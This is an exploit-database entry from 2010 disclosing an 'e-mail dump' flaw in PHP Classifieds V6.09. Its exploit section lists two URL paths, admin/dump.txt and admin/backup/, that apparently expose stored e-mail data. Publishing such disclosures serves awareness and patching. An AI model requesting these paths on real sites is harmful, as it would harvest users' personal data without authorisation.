id: 11523
date: 03/30/2010
title: PHP Classifieds V6.09 E-mail Dump Vulnerability
author: indoushka
cves: 

===============================================
PHP Classifieds V6.09 E-mail Dump Vulnerability 
===============================================

========================================================================================                 
| # Title    : PHP Classifieds V6.09 E-mail Dump Vulnerability          
| # Author   : indoushka                                                                                                             
| # Home     : www.dz-blackhat.com                                                                                                                                                                                                                  
| # Tested on: Lunix Fran?ais v.(9.4 Ubuntu)      
| # Bug      : E-mail Dump                                                            
======================      Exploit By indoushka       =================================
 # Exploit  :
  
     1- http://127.0.0.1/phpclassifieds/admin/dump.txt
      
     2- http://127.0.0.1/phpclassifieds/admin/backup/



#  0day.today [2023-03-23]  #